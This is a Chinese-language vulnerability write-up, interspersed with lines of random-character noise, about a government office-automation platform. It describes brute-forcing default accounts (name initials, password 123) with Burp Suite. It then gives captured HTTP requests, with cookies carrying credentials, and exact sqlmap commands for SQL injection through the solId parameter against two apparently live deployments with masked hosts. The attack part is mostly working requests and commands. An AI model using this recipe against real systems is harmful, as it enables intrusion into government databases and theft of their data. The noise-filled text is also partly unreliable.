|
# T* _7 A+ V# }& @% Q! U. H: ]
) n1 n6 A M: ~7 P; T ; |; j9 H. A) z/ ]+ I/ @6 T+ V
/ `' G+ a) E/ w$ ]* s/ Y- R1 Q
平台简介:- z$ ^, y. i s o: J. u1 J, V0 A
% n8 `) b3 \4 ^" |6 u: y6 d) L( [! s& H2 d2 b$ r8 X d8 i7 I5 G$ N( n2 F( W
1 \! p, o, O; C, ~" G8 [
( Z$ `) G' q B, w
' \" K7 I( a- F* o 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 5 X, `7 D/ ~' f" g
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
$ Y2 R8 W! a3 x3 ^' S" a$ ?. L9 W* H7 W同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
9 r9 F& V8 w2 B# `" R8 \! a
7 X+ H; @2 o1 V# y
+ K6 _6 j" \ _5 V5 f2 S3 J! G1 h
; p5 x' T$ d7 s& ?
% y! h1 W# C# B M4 ^- _& R1 w
. S5 U% G* w; I2 p) V 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:$ \! I. w P2 X9 e3 L- Q
4 @# y2 I, u) R
, J. E" s% X0 x: [0 n" ^1 s$ v
2 U# d! N( a! q' N) P c% k
, g, |; |: }6 T1 U7 E
2 m% H1 u% G/ j7 Z5 W) z: I http://1.1.1.1:7197/cap-aco/#(案例2-)
, L: \& Y" o, ~% F ^& A! h& K% E& G
( O+ o9 \" C' d: G% K) v/ C, n* L
7 l( t+ _$ j/ L4 l/ T, i4 a http://www.XXOO.com (案例1-官网网站)+ Q, Y* r+ n5 y1 d
P" C1 ~+ N0 u# K) E* `
7 A) N5 p5 L: E. b 9 |: W' v% r5 g
# V0 q- e6 ]2 r3 U* A" p: l/ x+ J: x1 O! ?: r9 R5 U
漏洞详情:
( }" G+ \% X, A: H: B - S# }/ c& d+ h: w
+ s y; g0 _5 ~1 W
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
8 E5 K7 @" l* d0 K, o: [. r
7 I) p. f o) ?+ _; p, H4 J" W; i+ h M/ d7 M9 D. m; B
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:( M# X( o5 M9 N) K% Q/ j5 e
( o, P+ d% w8 h( P
F) {) f5 C$ l8 [$ ]
3 s" ?2 S2 _0 E ; x* d4 N( ~* X6 q* }
- H+ {- v# |$ u+ W2 }
' h" |5 b; C. [1 s) p8 s9 Q; D % _& P# o0 [% v* G
% M: l Z/ a- E j a* {( M* z status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:; \9 ]( x% P- ?! ?: ]
5 ^( |9 T2 V6 O+ p- a
% ?3 L% Q: ?/ m2 s
1、案例1-官方网站( ^+ `9 V% @7 h( l
* n7 m+ ?- d5 X; @1 V! s$ Y5 h6 g2 t5 A- o# @; @6 i
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
$ H: {: C6 D" ~% \( B 2 a, M( ?* _& W7 C A
* j9 V( M5 B+ b8 K3 P& n7 q5 l. I Host: www.XXOO.com8 x' K6 h, s& S6 D0 A3 `- q9 v
3 Y! v6 J/ Q) N
; d) d% G; O; k5 Y, o4 n Proxy-Connection: Keep-Alive
' X( N/ t' S/ R# y9 n: v4 J
$ T7 {, z: [- c/ J7 y; ~- s( O2 {0 Q" k4 u& h3 a
Accept: application/json, text/javascript, */*; q=0.016 m7 B( _4 [5 A
0 J, M( \( W2 ?" r% U' y5 ]/ D4 C. f' p9 v& u3 d2 ^2 T/ e
Accept-Language: zh-CN& u7 [9 d1 I* }" j0 u. g
# @% A2 q' D% W o2 F
$ k0 c8 [; g/ `4 C% j. `. ^ Content-Type: application/json
0 B1 L7 L! e u5 ~3 `$ Y
4 e/ t% D3 [# c. s( T
& S* h+ G2 i4 r; X User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko, x1 x5 |5 u7 H
) j: I; J4 f; j+ B3 ?( c* o- D" X
X-Requested-With: XMLHttpRequest0 M6 Y) \8 d% _
# e5 Q$ I+ L8 i
6 f# f$ k. s5 o; M Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002* j1 w0 o6 T( C1 S/ m" Q9 L" ^
3 i1 V G) Q& }
/ D2 K# K4 X3 e; X6 ^5 t Accept-Encoding: gzip, deflate, sdch# R% K: O9 B V0 O7 Z( \
+ J. G( b' k4 D7 N0 p
. P+ i# N# H, j f7 o Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e3 a; K( b- F$ s; i6 g
4 F$ `! D( E) w; n W
^* o7 q. u6 Z. B3 h3 \ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
2 h" j3 o& Z1 A# v- D
; t' M" _- W5 T' O9 x
0 V+ u; H3 {9 s6 k ) \% J8 _, s4 S/ U: s& R! F& J3 O
; e/ ^0 `1 c% {' `& b, {; P
/ ^. }8 H: l) _; N M " c$ G: T( O% L9 N0 s- m, A8 O
! C+ U* \2 C: s8 ?5 D! U& Y( ~+ J' L1 \9 n
, e" a5 b+ w0 F7 X
- z& ?+ Z9 d$ P3 H+ q8 _
v4 p0 N6 [+ R# Q1 s# l& A |( B) ~/ _: U* k1 P7 S, r
% ?! z+ D4 p9 l: w
4 H! s u* z/ y- i' }3 k% i- q
^. {$ t1 Y2 ]4 z7 \3 m
+ ]* {9 ^9 v: Q. x7 z/ C
6 T( x, o9 Z3 X/ V
2、案例2-某天河云平台/ {. f1 j1 r9 {, D+ j4 A* G5 C
5 \/ O, Y9 @7 X; O$ |
6 a4 M% ?! ^ e9 {: ?. V0 e GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1: O1 ?8 H7 n4 U9 M& o
. }& d4 C4 p4 K$ Z3 N, }1 h+ m8 O& d1 Y, C/ `4 ?
Host: 1.1.1.:7197
- c/ R; A( `8 a) E. S" Z6 y . Y) p9 G( Y& _$ T
6 u& O/ \8 b' w9 @
Accept: application/json, text/javascript, */*; q=0.01
. H2 k% |( d- W( b
5 T e; Y+ L6 ]$ ?
4 S4 Q* [& T1 c6 Q; A' V6 } K2 a X-Requested-With: XMLHttpRequest
- x8 j* h, m7 Z3 J( U! X/ C1 o8 E ; I' P0 ^6 I1 }: E$ U- z
, n6 h9 @& b8 w% O" h3 T* s User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.09 M5 b6 s3 [9 v! G( W
* g0 B1 D% ?7 I" M
: W( v7 s3 J [; n- { Content-Type: application/json! H$ s- {3 H4 l- Q4 J9 c8 U) T
7 O. y, n. Q* h) T6 `
' o: j) ~' |& P& V Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008# @0 i& ?. M) H5 e& v5 b' P8 V
1 ^$ T8 ^4 C* e4 T" J, Z
8 }* _- y- [& Q1 J. ~ Accept-Language: zh-CN,zh;q=0.8* p, W5 g8 N/ {7 x7 s/ w1 i
) ]* [4 P# k' Y! ^% _. \8 a3 z, I
; O( f/ {6 N! w2 l Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=11 m( S) I6 e1 T" l0 D
/ y1 \2 j9 Z3 l" c0 o+ i- v! {/ X+ c9 ^5 l& Q r: W! Y7 {1 I
Connection: close
+ @2 Y; u. m: ?9 U/ P$ D$ Q0 @( Q ' ?! B! R) c! @! ~7 [
# P/ ?1 s; D: M8 K* q2 C 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
. Y" f/ @( D& J0 r; C0 Z
' Z( W6 z& T: U$ N# L& T
x" Z: F+ `! K+ N
7 f3 k7 m0 h$ J" m% A9 O0 z* F9 w; Q 8 S% R" X* I" c0 q. n" ~/ B, E
$ @$ s d2 L4 A, ^0 v; l
' a9 I+ _# |7 W |